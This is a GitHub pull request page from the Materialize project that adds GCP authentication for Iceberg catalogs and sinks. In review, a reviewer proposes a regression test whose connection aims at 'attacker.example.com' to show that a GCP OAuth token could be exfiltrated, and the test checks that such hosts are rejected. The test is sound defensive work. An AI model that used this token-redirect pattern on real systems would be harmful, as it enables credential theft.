[SS-69] Iceberg catalog/sink can use a GCP connection#36695
Merged
Conversation
4200bae to
154e6a1
Compare
def-
reviewed
May 27, 2026
Comment on lines
+971
to
+974
| retry: | ||
| automatic: | ||
| - exit_status: 1 | ||
| limit: 1 |
Contributor
There was a problem hiding this comment.
Why auto-retry? Do we expect it to be flaky?
Contributor
Author
There was a problem hiding this comment.
I don't expect it to be flaky. I'll turn off retries.
07ae4e1 to
3f8af05
Compare
patrickwwbutler
approved these changes
Jun 2, 2026
def-
reviewed
Jun 3, 2026
def-
left a comment
Contributor
There was a problem hiding this comment.
How worried are we about someone being able to exfiltrate the GCP OAuth2 access token? I would argue we should be quite worried and only allow passing it to actual GCP URLs. Currently this works:
diff --git a/test/iceberg/gcp-connection-validation.td b/test/iceberg/gcp-connection-validation.td
new file mode 100644
index 0000000000..a3a4435bf2
--- /dev/null
+++ b/test/iceberg/gcp-connection-validation.td
@@ -0,0 +1,41 @@
+# Copyright Materialize, Inc. and contributors. All rights reserved.
+#
+# Use of this software is governed by the Business Source License
+# included in the LICENSE file at the root of this repository.
+#
+# As of the Change Date specified in that file, in accordance with
+# the Business Source License, use of this software will be governed
+# by the Apache License, Version 2.0.
+
+# Regression test for SS-69: an Iceberg REST catalog connection that
+# authenticates with a GCP connection must only send its reusable, broadly-
+# scoped bearer token to a Google-operated host. Without a plan-time host check,
+# a principal with only USAGE on the GCP connection can aim the catalog URL at a
+# host they control and exfiltrate the service-account token.
+
+# Disable default validation so the accepted case below doesn't connect; the
+# host check is enforced at plan time, independent of validation.
+$ postgres-execute connection=postgres://mz_system:materialize@${testdrive.materialize-internal-sql-addr}
+ALTER SYSTEM SET enable_default_connection_validation = false
+
+> CREATE SECRET gcpsa AS 'dummy'
+
+> CREATE CONNECTION gcpconn TO GCP (SERVICE ACCOUNT KEY = SECRET gcpsa)
+
+# Exploit: a non-Google catalog host must be rejected before any token is sent.
+! CREATE CONNECTION evil TO ICEBERG CATALOG (
+ CATALOG TYPE = 'rest',
+ URL = 'https://attacker.example.com/iceberg/v1/restcatalog',
+ GCP CONNECTION = gcpconn,
+ WAREHOUSE = 'gs://anything'
+ )
+contains:must point URL at a *.googleapis.com host
+
+# Positive control: a real BigLake host is accepted, so the allowlist doesn't
+# break the feature.
+> CREATE CONNECTION biglake TO ICEBERG CATALOG (
+ CATALOG TYPE = 'rest',
+ URL = 'https://biglake.googleapis.com/iceberg/v1/restcatalog',
+ GCP CONNECTION = gcpconn,
+ WAREHOUSE = 'gs://anything'
+ )
diff --git a/test/iceberg/mzcompose.py b/test/iceberg/mzcompose.py
index 78aa241741..990848d1fb 100644
--- a/test/iceberg/mzcompose.py
+++ b/test/iceberg/mzcompose.py
@@ -80,6 +80,22 @@ def workflow_smoke(c: Composition) -> None:
)
+def workflow_gcp_connection_validation(c: Composition) -> None:
+ """Regression test for SS-69: an Iceberg REST catalog connection that
+ authenticates with a GCP connection must only target Google-operated catalog
+ hosts. A GCP access token is a reusable, broadly-scoped bearer credential
+ with no audience binding, so before this validation a principal with only
+ USAGE on a GCP connection could point the catalog URL at an attacker host and
+ exfiltrate the connection's service-account token. This exercises connection
+ planning only and needs no Iceberg backend."""
+ c.down(destroy_volumes=True)
+ c.up("materialized")
+
+ c.run_testdrive_files(
+ "gcp-connection-validation.td",
+ )
+
+
def workflow_mode_append(c: Composition) -> None:
key = _setup(c)and allows someone with only USAGE on the GCP connection object to send the oauth token to attacker.example.com.
0a4293d to
fb3cc5b
Compare
fb3cc5b to
c92b606
Compare
c92b606 to
8eee70d
Compare
a3408b2 to
7c400e7
Compare
240661f to
4bf1a89
Compare
e89154b to
fdbb619
Compare
3e15e10 to
a45821e
Compare
f9afd3e to
bdcdec3
Compare
ac9ed8a to
33835ac
Compare
resolve conflicts in xl (Iceberg REST + GCP): union import list + biglake parser test + GCP keyword
33835ac to
7428408
Compare
7428408 to
19a77b5
Compare
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
In this PR:
iceberg-rustRequestAuthenticatorusinggcp_authN.B. GCP BigLake doesn't perform Iceberg maintenance yet, so long-running Iceberg sinks will fail when the table metadata grows too large.
(ref: https://cloud.google.com/blog/products/data-analytics/improved-interoperability-for-your-apache-iceberg-lakehouse)
stacked on #36694